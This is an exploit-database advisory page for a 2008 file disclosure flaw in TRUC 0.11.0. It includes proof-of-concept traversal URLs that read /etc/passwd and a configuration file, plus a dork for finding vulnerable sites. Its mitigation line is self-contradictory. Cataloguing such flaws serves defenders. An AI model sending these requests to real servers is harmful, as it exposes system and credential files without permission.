header-logo
Suggest Exploit
vendor:
TRUC
by:
TRYAGI
7.5
CVSS
HIGH
Remote File Disclosure
200
CWE
Product Name: TRUC
Affected Version From: 0.11.0
Affected Version To: 0.11.0
Patch Exists: Yes
Related CWE: N/A
CPE: a:asdis:truc:0.11.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2008

TRUC 0.11.0 (download.php) Remote File Disclosure Vulnerability

TRUC 0.11.0 is vulnerable to a remote file disclosure vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable server. This request contains the filename of the file to be disclosed in the 'upload_filename' parameter. An attacker can use this vulnerability to disclose sensitive information such as configuration files, source code, etc.

Mitigation:

Upgrade to the latest version of TRUC 0.11.0 or later.
Source

Exploit-DB raw data:

### TRUC 0.11.0 (download.php) Remote File Disclosure Vulnerability
### http://switch.dl.sourceforge.net/sourceforge/truc/truc_0.11.0.tar.gz
### POC :
### /download.php?upload_filename=config_inc.php
### /download.php?upload_filename=../../../../../../../../etc/passwd
### Dork : TRUC 0.11.0 :: © 2006 by ASDIS :
### I'm TRYAGI  ;)  -- Tryag.cc/cc

# milw0rm.com [2008-02-16]

Navigation

Suggest Exploit

Services By CQR